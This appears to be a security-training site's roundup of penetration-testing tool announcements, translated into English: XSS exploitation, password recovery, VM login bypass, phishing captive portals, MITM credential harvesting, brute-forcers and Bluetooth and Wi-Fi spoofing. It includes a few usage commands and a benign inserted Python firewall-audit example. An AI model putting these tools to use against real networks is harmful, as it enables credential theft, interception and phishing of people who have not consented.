White Hat Hacker Capital: Buôn Ma Thuột

Vietnam White Hat Hacker training program in the city of Buôn Ma Thuột, combined with tourism. Arrive as a newbie, leave as a WHITE HAT HACKER!

Hacking and Penetration Testing with Metasploit

Security365's training program on using the Metasploit Framework for penetration testing (hacking).

C50 Computer Forensics Materials

Study materials on Computer Hacking Forensic Investigation (CHFI), compiled by Security365 for training at C50.

Students, Hacking and Information Security

A student hacking competition, with web application attack challenges for students built on the Hackademic Challenge platform.

Attack and Defense with BackTrack / Kali Linux

An attack and defense course using the professional hacker toolkits BackTrack and Kali Linux, based on Offensive Security course content.

[Xenotix] XSS Exploit Framework 2013 v2 Released


Xenotix XSS Exploit Framework is a penetration testing tool to detect and exploit XSS vulnerabilities in web applications. It can inject code into a web page that is vulnerable to XSS. It is essentially a payload-list-based XSS scanner and XSS exploitation kit: it gives a penetration tester the ability to test every XSS payload in the payload list against a web application. The tool supports both a manual mode and an automated, time-sharing-based test mode. The exploitation part of the framework includes an XSS encoder, a victim-side XSS keystroke logger, an executable drive-by downloader and an XSS reverse shell. These exploitation tools help the penetration tester create proof-of-concept attacks against vulnerable web applications while writing a penetration test report.

Features: 

  • Built in XSS Payloads
  • XSS Key logger
  • XSS Executable Drive-by downloader
  • Automatic XSS Testing
  • XSS Encoder
  • XSS Reverse Shell (new)
Download Xenotix XSS Exploit Framework 2013 v2

[Network Password Decryptor v3.0] Tool to Recover Network Passwords

Network Password Decryptor is the free tool to instantly recover network passwords stored in the 'Credential Store' of Windows.

The Windows 'Credential Store' provides the framework for storing various network-authentication passwords in a secure, encrypted format.

Not only does Windows use it to store network authentication passwords, but other applications such as Outlook, Windows Live Messenger, Remote Desktop, Gmail Notifier etc. also use it to store their login passwords. These network passwords are saved only when the user selected the 'Remember Password' option at login time.

These network passwords are stored in encrypted form and even an administrator cannot view them. Some types of passwords cannot be decrypted even by administrators, as they require special privileges. In this context, NetworkPasswordDecryptor makes it easy to detect and decrypt all of these stored network passwords from the Credential Store.

Current version v3.0 supports network password recovery from Windows 8.

NetworkPasswordDecryptor works on a wide range of platforms, from Windows XP up to the latest operating system, Windows 8.

Screenshots
Here are the screenshots of NetworkPasswordDecryptor
Screenshot 1: NetworkPasswordDecryptor showing all the recovered passwords from Windows 8.

Screenshot 2: Report showcasing all the recovered network passwords on Windows 8 system

[VSD] (Virtual Section Dumper) Just another Virtual Section Dumper for Windows Processes

What's VSD?

VSD (Virtual Section Dumper) is intended to be a tool to visualize and dump the memory regions of a running 32-bit or 64-bit process in many ways. For example, you can dump the entire process and fix the PE header, dump a given range of memory, or even list and dump every virtual section present in the process.
Usage of VSD can be found here

Screenshots

VSD x86: main window, loaded modules, handles, threads, patch.

VSD x64: main window.

Latest changes

VSD x86

Version: 2.1 (18/11/2012)
  • Added "Ignore unnamed objects" in the window handles.
  • Added "Set Priority" feature in order to set the priority of a given process. issue 8
  • Added "Suspend process" and "Resume process" features. issue 10
  • Added "Suspend all threads before dumping". Using this option you can suspend the execution of a given process before dumping it. issue 5
  • Added updatevsd.exe. More information can be found here
Version: 2.0 (01/04/2012)
  • Added a menu bar.
  • Added a module list viewer.
  • Added Dump Full and Dump Partial over a specific module.
  • Added sorting feature in the module list viewer.
  • Added a handle list viewer.
  • Added sorting feature in the handle list viewer.
  • Added a thread list viewer.
  • Added Resume, Terminate and Suspend functions in the thread list viewer.
  • Added the "Patch" feature.
  • Bugfixes in some functions.
  • Code refactoring in some functions. The code still needs a lot of improvements :P
Version: 1.1
  • Fixed a bug in the PastePEHeader() function when calculating the offset of the original PE Header.
Version: 1.0
  • First stable release (I hope so :)

VSD x64

Version: 1.0
  • First stable release. 

Download Virtualsectiondumper

http://adf.ly/146CHL

[ISME v0.7] IP Phone Scanning Made Easy


ISME is a small framework to test IP phones from several vendors. It can gather information from IP phone infrastructures, test their web servers for default login/password combinations, and also implement attacks against the systems. ISME has been written in Perl with a Perl/Tk interface to provide a portable and easy-to-use tool. Full documentation is also provided.

Initially intended as a scanner dedicated to the Cisco IP Telephony solution, ISME has evolved into a small framework to test IP phones from several vendors.

Nevertheless, the four goals I had in mind at the beginning are still present:
  • Provide a simple tool to use,
  • Trying to create something new dedicated to IP telephony,
  • Targeting enterprise solutions,
  • Exploiting LAN connection possibilities.

Download ISME v0.7 (Zip - 5 Mb) 
isme_v0.7 documentation (PDF - 3.4 Mb)

Version follow up

V0.7 – 15/11/2012
  • Tool: Add Cisco phone logout mobility feature abuse.
  • Tool: Implement a module to detect the use of default login/password on the embedded web interface of Mitel phones.
  • Exploit: Add Aastra IP phone information disclosure (OSVDB-ID: 72941 / EDB-ID 17376).
  • Exploit: Add Avaya IP Office Linux voicemail password file data disclosure.
  • Exploit: Add the script providing phone call and remote taping on SNOM phones.
  • Exploit: Add Mitel AWC unauthenticated command execution (OSVDB-ID: 69934 / EDB-ID 15807).
V0.6 – 30/08/2012
  • Implement code to exploit the Polycom IP Phones data disclosure vulnerability (OSVDB-ID: 73117).
  • Implement code to exploit the Polycom IP Phones DoS through the web interface (OSVDB-ID: 70697).
  • Implement a module to detect Polycom SoundPoint IP Phones' use of default login/password and unprotected web interface.
  • Add the capacity to scan a full subnet for Aastra & SNOM default login/password search. The capacity to save results in text files has also been added.
  • Add an integrated graphical module for Protos SIP in ISME (needs Java to work).
  • Cisco phone ringer & forwarder support new types of IP phone: 7914, 7915, 7916, 7920, 7921, 7925, 7985.
  • Due to some problems met by users at installation, I finally came back to an install process mainly based on CPAN.
V0.5 – 06/08/2012
  • Add SIP flooding attacks (Invite, Register, Options).
  • Add TCP SYN flood attack.
  • Update installer.
  • Change menu presentation.
V0.4 – 12/06/2012
  • Add Cisco phone attacks (ringer & forwarder – skinny).
  • Add LAN & server attacks (DHCP starvation & DNS subnet resolver).
V0.3 – 12/02/2012
  • All kinds of subnets are now supported; ISME is no longer limited to "/24". Take care: this is done with a new library. Be sure to install it (or run the installation script, which has been adapted) before launching this new version.
  • Add the capacity to detect default passwords on SNOM IP phones.
V0.2 – 03/01/2012
  • Add an installer for all the Perl modules.
  • Add the capacity to detect default passwords on Aastra IP phones.
V0.1 – 20/12/2011
  • First release of the ISME script.

[VMInjector] DLL Injection tool to unlock guest VMs


Overview: VMInjector is a tool designed to bypass OS login authentication screens of major operating systems running on VMware Workstation/Player, by using direct memory manipulation.
Description:
VMInjector is a tool which manipulates the memory of VMware guests in order to bypass the operating system's authentication screen.

VMware handles the resources allocated to guest operating systems, including RAM memory. VMInjector injects a DLL library into the VMWare process to gain access to the mapped resources. The DLL library works by parsing memory space owned by the VMware process and locating the memory-mapped RAM file, which corresponds to the guest’s RAM image. By manipulating the allocated RAM file and patching the function in charge of the authentication, an attacker gains unauthorised access to the underlying virtual host.

VMInjector can currently bypass locked Windows, Ubuntu and Mac OS X operating systems.

The in-memory patching is non-persistent, and rebooting the guest virtual machine will restore the normal password functionality.

Attacking Scenarios:
VMInjector can be used if the password of a virtual host is forgotten and requires reset.

More commonly, the tool is used during penetration testing activities, when access to a VMware host has been achieved and the tester is looking to gain additional access to the guests running on that host.

Requirements:
  • Windows machine (with administrative access);
  • VMware workstation or player edition;
  • A locked guest VM;
Usage:
VMInjector consists of 2 parts:
  • The DLL injection application (python script or provided converted executable)
  • DLL library (x86 and x64)
The tool supports both x86 and x64 architectures by providing both DLLs. One may also use one's own DLL injector to select the guest virtual machine running on the host.
In order to run the tool, execute the VMInjector (32 or 64) executable provided from the command line as shown in figure 1.

  Figure 1: List of running guest machines running.

VMWare runs each guest in a different process. VMInjector needs to be pointed to the process running the guest which requires bypass. Once the user chooses a process, it will inject the DLL into the chosen target.
Once the DLL is injected, the user will need to specify the OS, so that the memory patching can be accomplished, as shown in Figure 2.

Figure 2: Searching for OS signature in memory and patching.
Tool and Source Code:
The tool executable and source code can be found on GitHub (http://adf.ly/146CVz)

[PwnStar] Version with new Exploits

A bash script to launch a Soft AP, configurable with a wide variety of attack options. Includes a number of index.html and server php scripts, for sniffing/phishing. Can act as multi-client captive portal using php and iptables.  Launches classic exploits such as evil-PDF. De-auth with aireplay, airdrop-ng or MDK3.

PwnSTARscreenshot
Changes and New Features
  • "hotspot_3" is a simple phishing web page, used with basic menu option 4.
  • "portal_simple" is a captive portal which allows you to edit the index.html with the name of the portal, e.g. "Joe's CyberCafe". It is used for sniffing.
  • "portal_hotspot3" phishes credentials, and then allows clients through the portal to the internet.
  • "portal_pdf" forces the client to download a malicious PDF in order to pass through the portal.
Updated feature list:
  • captive-portal with iptables and php
  • more php scripts added
  • exploits added
  • mdk3 and airdrop deauth
General Features :
  • manage interfaces and MACspoofing
  • set up sniffing
  • serve up phishing or malicious web pages
  • launch karmetasploit
  • grab WPA handshakes
  • de-auth clients
  • manage IPtables

Download Here

[PwnPi v2.0] A Pen Test Drop Box distro for the Raspberry Pi

PwnPi is a Linux-based penetration testing drop-box distribution for the Raspberry Pi. It currently has 114 network security tools pre-installed to aid the penetration tester. It is built on the Debian squeeze image from the Raspberry Pi Foundation's website and uses Xfce as the window manager.

Login username and password is root:root
download

Tools List:
list

Download Here

[NetSleuth] Open source Network Forensics And Analysis Tools

NetSleuth identifies and fingerprints network devices by silent network monitoring or by processing data from PCAP files.

NetSleuth is an opensource network forensics and analysis tool, designed for triage in incident response situations. It can identify and fingerprint network hosts and devices from pcap files captured from Ethernet or WiFi data (from tools like Kismet).
It also includes a live mode, silently identifying hosts and devices without needing to send any packets or put the network adapters into promiscuous mode ("silent portscanning").
NetSleuth is a free network monitoring, cyber security and network forensics analysis (NFAT) tool that provides the following features:
  • An easy realtime overview of what devices and what people are connected to any WiFi or Ethernet network.
  • Free. The tool can be downloaded for free, and the source code is available under the GPL.
  • Simple and cost effective. No requirement for hardware or reconfiguration of networks.
  • “Silent portscanning” and undetectable network monitoring on WiFi and wired networks.
  • Automatic identification of a vast array of device types, including smartphones, tablets, gaming consoles, printers, routers, desktops and more.
  • Offline analysis of pcap files, from tools like Kismet or tcpdump, to aid in intrusion response and network forensics.

[TXDNS v 2.2.1] Aggressive multithreaded DNS digger

TXDNS is a Win32 aggressive multithreaded DNS digger, capable of placing thousands of DNS queries per minute on the wire. TXDNS's main goal is to expose a domain namespace through a number of techniques:
-- Typos: Mised, doouble and transposde keystrokes;
-- TLD/ccSLD rotation;
-- Dictionary attack;
-- Full Brute-force attack: alpha, numeric or alphanumeric charsets.

New features:

  • Support for AAAA (IPv6) record queries: -rr AAAA;
  • Rewrote the summarizing statistics using a thread-safe algorithm instead of a mutex.

Bug fixes:

  • Fixed a problem when running under Windows XP;
  • Fixed a problem when parsing an IPv6 address.

November 9th, 2012 by Arley Silveira

[SSLsplit 0.4.5] Tool for man-in-the-middle attacks against SSL/TLS encrypted network connections

SSLsplit is a tool for man-in-the-middle attacks against SSL/TLS encrypted network connections.  Connections are transparently intercepted through a network address translation engine and redirected to SSLsplit.  SSLsplit terminates SSL/TLS and initiates a new SSL/TLS connection to the original destination address, while logging all data transmitted.  SSLsplit is intended to be useful for network forensics and penetration testing.

SSLsplit supports plain TCP, plain SSL, HTTP and HTTPS connections over both IPv4 and IPv6.  For SSL and HTTPS connections, SSLsplit generates and signs forged X509v3 certificates on-the-fly, based on the original server certificate subject DN and subjectAltName extension.  SSLsplit fully supports Server Name Indication (SNI) and is able to work with RSA, DSA and ECDSA keys and DHE and ECDHE cipher suites.  SSLsplit can also use existing certificates of which the private key is available, instead of generating forged ones.  SSLsplit supports NULL-prefix CN certificates and can deny OCSP requests in a generic way.

Requirements

SSLsplit depends on the OpenSSL and libevent 2.x libraries. The build depends on GNU make and a POSIX.2 environment in `PATH`. The (optional) unit tests depend on check.

SSLsplit currently supports the following operating systems and NAT engines:
  • FreeBSD: pf rdr, ipfw fwd, ipfilter rdr
  • OpenBSD: pf rdr
  • Linux: netfilter REDIRECT and TPROXY
  • Mac OS X: ipfw fwd

Installation

    make
    make test       # optional unit tests
    make install    # optional install

Dependencies are autoconfigured using pkg-config.  If dependencies are not
picked up and fixing `PKG_CONFIG_PATH` does not help, you can specify their
respective locations manually by setting `OPENSSL_BASE`, `LIBEVENT_BASE` and/or
`CHECK_BASE` to the respective prefixes.

You can override the default install prefix (`/usr/local`) by setting `PREFIX`.

Development

SSLsplit is being developed on Github.  For bug reports, please use the Github
issue tracker.  For patch submissions, please send me pull requests.

Download SSLsplit 0.4.5

[Network Database Scanner v1.0] Software to remotely detect the type of Database services running on the network system


Network Database Scanner is a free tool to remotely detect the type of database services running on networked systems. It can scan a single system or multiple systems on your internal network or on the Internet.

It uses smart timer based Connect method which makes the scanning faster than traditional approach.

Current version supports following popular Database Services, 
  •     MySQL
  •     MSSQL
  •     Oracle
  •     DB2
  •     PostgreSQL
After a successful scan, it performs fingerprint verification for a few databases. In the case of MySQL, it also detects the current database version.

Penetration Testers can find it useful in remotely detecting the presence of database services on the network. Then based on the type of Database, they can use additional tools such as Mysql Password Auditor, Oracle Password Auditor etc to get greater results.

'Network Database Scanner' works perfectly on 32bit as well as 64 bit systems and supports all Windows platforms starting from Windows XP to Windows 8.

License  : Freeware
Platform : Windows XP, 2003, Vista, Win7, Win
more info
[FTP Password Kracker] Crack FTP password

FTP Password Kracker is a free software to recover your lost FTP password directly from server. It uses brute-force password cracking method based on universal FTP protocol and can recover password from any FTP server.

It automatically detects and alerts you if the target FTP server allows any Anonymous (without password) connections. In case your FTP server is running on different port (other than port 21) then you can easily specify the same in the tool along with server IP address.

By default it includes sample dictionary (password list) file for password cracking. However you can find good collection of password dictionaries (also called wordlists) here & here.
If your password is complex then you can use tools like Crunch, Cupp to generate brute-force based or any custom password list file and then use it with 'FTP Password Kracker'.


For penetration testers and forensic investigators, it can be very handy tool in discovering poorly configured FTP accounts.
It works on both 32 bit & 64 bit windows systems starting from Windows XP to Windows 8.

Here are the main benefits of FTP Password Kracker:

  • Free tool to recover the lost FTP password
  • Works against any FTP server.
  • Automatically remembers last used settings
  • Option to specify non-standard FTP port.
  • Uses a simple & quick dictionary crack method
  • Displays detailed statistics during Cracking operation
  • Stop the password cracking operation any time.
  • Generate Password Recovery report in HTML/XML/TEXT format.
  • Includes Installer for local Installation & Uninstallation.
How to use? 

It is very easy to use tool for any generation of users.

Here are simple steps:
  • Install 'FTP Password Kracker' on any system.
  • Enter the IP Address & Port number (default 21) of the FTP Server.
  • Then enter the username (Example: admin, anonymous etc)
  • Next select the password dictionary file by clicking on Browse button or simply drag & drop it. You can find a sample dictionary file in the installed location.
  • Finally click on 'Start Crack' to start the FTP Password recovery.
  • During the operation, you will see all statistics being displayed on the screen. Message box will be displayed on success.
  • At the end, you can generate detailed report in HTML/XML/Text format by clicking on 'Report' button and then select the type of file from the drop down box of 'Save File Dialog'.

Download FTP Password Kracker
License  : Freeware
Platform : Windows XP, 2003, Vista, Win7, Win8
More Info

[ShowWindows v1.0] Command-line Tool to Manage Open Windows


Show Windows is the command-line tool to manage Windows opened by all running Processes on your system.

In addition to showing open windows, it can do a little more. Here are some of the things that you can do with ShowWindows:
  • View all open Windows/Apps
  • Windows opened by particular User
  • Windows opened by particular Process
  • Search for Windows with specified Title
  • Close the Window
  • Kill the selected Process


In a penetration testing environment, it can help you discover all kinds of activity happening on the target system. Compared with a plain listing of running processes, the list of open windows can reveal more interesting details: for example, which files the user currently has open, what songs/videos are being played, what websites are being viewed, etc.


'Show Windows' is available in both 32 bit & 64 bit versions. It works on all Windows Platforms starting from Windows XP to latest version, Windows 8.

Examples of ShowWindows
//Show all open windows
ShowWindows.exe

//List all open windows belonging to process id 1000
ShowWindows.exe -p 1000

//List all open windows belonging to user admin
ShowWindows.exe -u "admin"

//Close the Window with title 'Mozilla Firefox'
ShowWindows.exe -c "Mozilla Firefox"

//Kill the Process with PID 1000
ShowWindows.exe -k 1000

//List all open Windows having title Chrome
ShowWindows.exe -s "chrome"


Download ShowWindows 
License : Freeware
Platform : Windows XP, 2003, Vista, Win7, Win8
More info

[Dissy] Graphical frontend to the objdump disassembler


Dissy is a graphical frontend to the objdump disassembler. Dissy can be used for debugging and browsing compiler-generated code. 
Download Dissy

[Patator Brute Forcer] v 0.4

Patator is a multi-purpose brute-forcer, with a modular design and a flexible usage.

Currently it supports the following modules:
 * ftp_login     : Brute-force FTP
 * ssh_login     : Brute-force SSH
 * telnet_login  : Brute-force Telnet
 * smtp_login    : Brute-force SMTP
 * smtp_vrfy     : Enumerate valid users using the SMTP VRFY command
 * smtp_rcpt     : Enumerate valid users using the SMTP RCPT TO command
 * finger_lookup : Enumerate valid users using Finger
 * http_fuzz     : Brute-force HTTP/HTTPS
 * pop_login     : Brute-force POP
 * pop_passd     : Brute-force poppassd (not POP3)
 * imap_login    : Brute-force IMAP
 * ldap_login    : Brute-force LDAP
 * smb_login     : Brute-force SMB
 * smb_lookupsid : Brute-force SMB SID-lookup
 * vmauthd_login : Brute-force VMware Authentication Daemon
 * mssql_login   : Brute-force MSSQL
 * oracle_login  : Brute-force Oracle
 * mysql_login   : Brute-force MySQL
 * pgsql_login   : Brute-force PostgreSQL
 * vnc_login     : Brute-force VNC
 * dns_forward   : Brute-force DNS
 * dns_reverse   : Brute-force DNS (reverse lookup subnets)
 * snmp_login    : Brute-force SNMPv1/2 and SNMPv3
 * unzip_pass    : Brute-force the password of encrypted ZIP files
 * keystore_pass : Brute-force the password of Java keystore files

The name "Patator" comes from http://www.youtube.com/watch?v=xoBkBvnTTjo

Patator is NOT script-kiddie friendly, please read the README inside patator.py before reporting. 


Patator Brute Forcer 0.4

[360-FAAR] Firewall Analysis Audit And Repair 0.3.6

360-FAAR (Firewall Analysis Audit and Repair) is an offline, command-line Perl firewall policy manipulation tool to filter, compare to logs, merge, translate and output firewall commands for new policies, in Checkpoint dbedit, Cisco ASA or ScreenOS commands, and it's one file!

Read Policy and Logs for:

Checkpoint FW1 (in odumper.csv / logexport format),
Netscreen ScreenOS (in get config / syslog format),
Cisco ASA (show run / syslog format),

360-FAAR uses both inclusive and exclusive CIDR and text filters, permitting you to split large policies into smaller ones for virtualisation while at the same time removing unused connectivity.

360-FAAR supports policy-to-log association, object translation, rulebase reordering and simplification, rule moves and duplicate matching automatically, allowing you to seamlessly move rules to where you need them.

TRY: 'print' mode. One command, and spreadsheet for your audit needs!
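The policy-to-log association and inclusive/exclusive CIDR filtering described above, as an added illustration written for this page: it is not 360-FAAR's own code and does not read its odumper, ScreenOS or ASA formats. It parses a constructed, simplified rule CSV and a few constructed key=value log lines, attributes each log hit to the first matching rule (first-match semantics, as on a real firewall), reports rules that never matched as cleanup candidates, and applies CIDR filters to the rulebase. The CSV layout, the log field names and all addresses are assumptions made for the example.

```python
"""Toy firewall policy audit: rule/log association and CIDR filtering.

Added example for this page, not 360-FAAR's own code. The rule CSV layout,
the key=value log format and all addresses below are constructed assumptions.
"""
import ipaddress
from collections import Counter
from dataclasses import dataclass

# Constructed, simplified policy: first matching rule wins, last rule is the cleanup drop.
RULES_CSV = """
# name, src, dst, service, action
web_in,     0.0.0.0/0,    10.1.0.10/32, tcp/443,  accept
dmz_to_db,  10.1.0.0/24,  10.2.0.5/32,  tcp/5432, accept
legacy_ftp, 10.1.0.0/24,  10.2.0.9/32,  tcp/21,   accept
admin_ssh,  10.9.0.0/24,  10.0.0.0/8,   tcp/22,   accept
cleanup,    0.0.0.0/0,    0.0.0.0/0,    any,      drop
"""

# Constructed syslog-style hits (key=value fields), as a firewall might export them.
LOG_LINES = [
    "src=203.0.113.7 dst=10.1.0.10 proto=tcp dport=443 action=accept",
    "src=10.1.0.20 dst=10.2.0.5 proto=tcp dport=5432 action=accept",
    "src=10.9.0.3 dst=10.2.0.5 proto=tcp dport=22 action=accept",
    "src=198.51.100.9 dst=10.1.0.10 proto=tcp dport=22 action=drop",
]


@dataclass
class Rule:
    name: str
    src: ipaddress.IPv4Network
    dst: ipaddress.IPv4Network
    service: str   # "tcp/443" style, or "any"
    action: str


def parse_rules(csv_text):
    """Parse the constructed CSV layout into Rule objects, keeping policy order."""
    rules = []
    for line in csv_text.strip().splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        name, src, dst, service, action = [f.strip() for f in line.split(",")]
        rules.append(Rule(name,
                          ipaddress.ip_network(src, strict=False),
                          ipaddress.ip_network(dst, strict=False),
                          service, action))
    return rules


def first_match(rules, src_ip, dst_ip, service):
    """Return the first rule matching the flow, mirroring firewall first-match semantics."""
    src = ipaddress.ip_address(src_ip)
    dst = ipaddress.ip_address(dst_ip)
    for rule in rules:
        if src in rule.src and dst in rule.dst and rule.service in ("any", service):
            return rule
    return None


def associate_logs(rules, log_lines):
    """Count log hits per rule; lines that no rule explains are returned for manual review."""
    hits = Counter()
    unmatched = []
    for line in log_lines:
        fields = dict(kv.split("=", 1) for kv in line.split())
        service = f"{fields['proto']}/{fields['dport']}"
        rule = first_match(rules, fields["src"], fields["dst"], service)
        if rule is None:
            unmatched.append(line)
        else:
            hits[rule.name] += 1
    return hits, unmatched


def unused_rules(rules, hits):
    """Rules with no log hits are the cleanup candidates an audit would flag."""
    return [r.name for r in rules if hits[r.name] == 0]


def cidr_filter(rules, include=None, exclude=None):
    """Inclusive filter keeps rules whose src or dst lies entirely inside `include`;
    exclusive filter drops rules whose src or dst lies entirely inside `exclude`."""
    inc = ipaddress.ip_network(include) if include else None
    exc = ipaddress.ip_network(exclude) if exclude else None

    def inside(rule, net):
        return rule.src.subnet_of(net) or rule.dst.subnet_of(net)

    return [r for r in rules
            if (inc is None or inside(r, inc)) and (exc is None or not inside(r, exc))]


def audit(csv_text=RULES_CSV, log_lines=LOG_LINES):
    """Run the whole pass and return a summary dict."""
    rules = parse_rules(csv_text)
    hits, unmatched = associate_logs(rules, log_lines)
    return {"hits": dict(hits), "unmatched": unmatched, "unused": unused_rules(rules, hits)}


if __name__ == "__main__":
    summary = audit()
    for rule_name, count in summary["hits"].items():
        print(f"{rule_name:12s} {count} hit(s)")
    print("unused rules:", summary["unused"])
    rules = parse_rules(RULES_CSV)
    print("rules inside 10.2.0.0/24 minus 10.2.0.9/32:",
          [r.name for r in cidr_filter(rules, include="10.2.0.0/24", exclude="10.2.0.9/32")])
```

With the constructed data, `legacy_ftp` never appears in the logs and is reported as unused, which is the kind of dead connectivity the "cleanup if a log file is provided" feature removes; the CIDR filter then isolates the rules that belong to the 10.2.0.0/24 segment, the operation used to carve a large policy into a smaller one for a virtualised firewall.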

Features

  • Written in simple Perl; needs only standard modules; is one file.
  • Easy-to-edit, menu-driven text interface.
  • Capable of manipulating tens of thousands of rules, objects and groups.
  • Handles infinitely deep groups.
  • Capable of CIDR filtering connectivity in/out of policy rulebases.
  • Capable of merging rulebases.
  • Identifies existing connectivity in rulebases and policies.
  • Automatically performs cleanup if a log file is provided.
  • Keeps DR connectivity via any text or IP tag.
  • Encryption rules can be added during policy moves to remove the "merge from" rules for traffic that would be encrypted by the time it reached the firewall on which the "merge to" policy is to be installed (sounds complicated, but it is not in practice; appropriate IKE and ESP rules should be added manually).
  • Runs consistency checks on its own objects and rule definitions.
  • Extendable via a simple elsif in the user interaction loop section.

Easy to execute:
  • ./360-faar.pl <FW CONFIG TYPE> <log> <config> <nats> <FW CONFIG TYPE> <log> <config> <nats> <FW CONFIG TYPE> <log> <config> <nats>

Config types (Cisco soon!):
  • od = logexported logs, object dumper format config, fwdoc format NAT rules CSV
  • ns = syslog format logs, ScreenOS 6 format config; NATs are included in the policy but not fully processed yet, though fwdoc format NATs can be used
  • cs = Cisco ASA syslog file, Cisco ASA format config (not ready yet)

Output types:
  • od = output an odumper/ofiller format config to file, and print the dbedit commands for the rulebase creation to screen
  • ns = outputs NetScreen ScreenOS 6 objects and policies (requires a NetScreen config or zone info)
  • cs = Cisco ASA format config (not ready yet)

  • By default 360-FAAR accepts exactly 3 configs on the command line.
  • Make an empty file called "fake" and use it as the file name for log, config and nats if you want to process fewer than 3 configs at once.
  • Log file headers in FW1 logexported logs are found automatically, so many files can be cat'ed together.

Further processing and manual editing:
  • Output odumper/ofiller format files and make them more readable (watch out for spaces in names) using the numberrules helper script.
  • Edit these CSVs in OpenOffice or Excel using any of the object or group definitions from the three loaded configs.
  • You can then use this file as a template to translate to many different firewalls using the 'bldobjs' mode.

[GNUnet P2P Framework] v 0.9.4

GNUnet is a framework for secure peer-to-peer networking that does not use any centralized or otherwise trusted services. A first service implemented on top of the networking layer allows anonymous censorship-resistant file-sharing. Anonymity is provided by making messages originating from a peer indistinguishable from messages that the peer is routing. All peers act as routers and use link-encrypted connections with stable bandwidth utilization to communicate with each other. GNUnet uses a simple, excess-based economic model to allocate resources. Peers in GNUnet monitor each others behavior with respect to resource usage; peers that contribute to the network are rewarded with better service. GNUnet is part of the GNU project.

We're happy to announce the release of GNUnet 0.9.4. Key new features in GNUnet 0.9.4 include:
  • flow- and congestion-control for GNUnet's multicast subsystem
  • support for exit policies and exit discovery for the GNUnet VPN
  • support for reverse-proxies for HTTP and HTTPS transports
  • GNUnet Naming System, an initial implementation of the GNU Alternative Domain System (GADS)
  • gnunet-auto-share for automatically sharing a directory is available again
  • gnunet-download now has a progress bar
  • new API for ultra large-scale testing and benchmarking
  • new API for reliable, ordered bidirectional communication between peers
  • reductions in memory consumption (about 25%)
  • performance improvements, especially on W32
Download: Source Code (TGZ)

[Subterfuge] Beta Version 4.2

 Automated Man-in-the-Middle Attack Framework 
Abstract:  

Enter Subterfuge, a Framework to take the arcane art of Man-in-the-Middle Attack and make it as simple as point and shoot. A beautiful, easy to use interface which produces a more transparent and effective attack is what sets Subterfuge apart from other attack tools. Subterfuge demonstrates vulnerabilities in the ARP Protocol by harvesting credentials that go across the network, and even exploiting machines through race conditions. Now walk into a corporation… A rapidly-expanding portion of today’s Internet strives to increase personal efficiency by turning tedious or complex processes into a framework which provides instantaneous results.

On the contrary, much of the information security community still finds itself performing manual, complicated tasks to administer and protect their computer networks. Given the increase in automated hacking tools, it is surprising that a simplistic, “push-button” tool has not been created for information security professionals to validate their networks’ ability to protect against a Man-In-The-Middle attack. Subterfuge is a small but devastatingly effective credential-harvesting program which exploits a vulnerability in the Address Resolution Protocol. It does this in a way that a non-technical user would have the ability, at the push of a button, to harvest all of the usernames and passwords of victims on their connected network, thus equipping information and network security professionals with a “push-button” security validation tool.   


Download: http://code.google.com/p/subterfuge

Subterfuge DEFCON 20 Teaser:  http://www.youtube.com

[Cookie Cadger] v.0.9

An auditing tool for Wi-Fi or wired Ethernet connections 

Cookie Cadger helps identify information leakage from applications that utilize insecure HTTP GET requests.


Cookie Cadger works on Windows, Linux, or Mac, and requires Java 7. Using Cookie Cadger requires having “tshark” – a utility which is part of the Wireshark suite, to be installed. Usually simply installing Wireshark will be sufficient. Additionally, to capture packets promiscuously requires compatible hardware. Capturing Wi-Fi traffic requires hardware capable of monitor mode, and the knowledge of how to place your device into monitor mode.

Download

[PySQLi] Python SQL injection framework

PySQLi is a python framework designed to exploit complex SQL injection vulnerabilities. It provides dedicated bricks that can be used to build advanced exploits or easily extended/improved to fit the case.

PySQLi is designed to be easily modified and extended through derived classes, and to be able to inject in various ways, such as via the command line, custom network protocols and even anti-CSRF-protected HTTP forms.

PySQLi is still in an early stage of development, even though it has been under development for more than three years. The current version still lacks many features, but this will be improved in the coming months/years.


[ExploitShield Browser Edition] Forget about browser vulnerabilities

ExploitShield Browser Edition protects against all known and unknown 0-day vulnerability exploits, protecting users where traditional antivirus and security products fail. It consists of an innovative patent-pending vulnerability-agnostic application shielding technology that prevents malicious vulnerability exploits from compromising computers.
It includes "shields" for all major browsers (IE, Firefox, Chrome, Opera) and all browser components such as Java, Adobe Reader, Flash and Shockwave. It blocks all exploit kits such as Blackhole, Sakura, Phoenix and Incognito without requiring any signature updates.
No need to train or configure, ExploitShield is 100% install-and-forget anti-exploit solution. Read more: ExploitShield Browser Edition. The ZeroVulnerabilityLabs website maintains a realtime list of detected threats and their VirusTotal results.

[Spooftooph 0.5.2] Automated spoofing or cloning Bluetooth device

Spooftooph is designed to automate spoofing or cloning the Name, Class and Address of a Bluetooth device. Cloning this information effectively allows a Bluetooth device to hide in plain sight. Bluetooth scanning software will only list one of the devices if more than one device in range shares the same device information (specifically the same Address) while the devices are in Discoverable Mode.

Features
  • Clone and log Bluetooth device information
  • Generate a random new Bluetooth profile
  • Change Bluetooth profile every X seconds
  • Specify device information for Bluetooth interface
  • Select device to clone from scan log
Usage: To modify the Bluetooth adapter, spooftooph must be run with root privileges. Spooftooph offers five modes of usage:

1) Specify NAME, CLASS and ADDR.
root@thnlab: spooftooph -i hci0 -n new_name -a 00:11:22:33:44:55 -c 0x1c010c

2) Randomly generate NAME, CLASS and ADDR.
root@thnlab: spooftooph -i hci0 -R

3) Scan for devices in range and select device to clone. Optionally dump the device information in a specified log file.
root@thnlab: spooftooph -i hci0 -s -w file.csv

4) Load in device info from log file and specify device info to clone.
root@thnlab: spooftooph -i hci0 -r file.csv

5) Clone a random in-range device's info every X seconds.
root@thnlab: spooftooph -i hci0 -t 10

Download Spooftooph 0.5.2

[Wifi Honey] Creates fake APs using all encryption

This is a script an attacker can use to create fake APs using all encryption types and monitor them with airodump-ng. It automates the setup process: it creates five monitor-mode interfaces, four of which are used as APs while the fifth is used for airodump-ng. To make things easier, rather than having five windows, all of this is done in a screen session, which lets you switch between screens to see what is going on. All sessions are labelled so you know which is which.



Installing and running wifi honey (the arguments are ESSID, channel and interface; channel and interface are optional):
chmod a+x wifi_honey.sh
./wifi_honey.sh fake_wpa_net
./wifi_honey.sh fake_wpa_net 1 wlan1

Download Wifi Honey

[Burp Suite] Free Edition v1.5

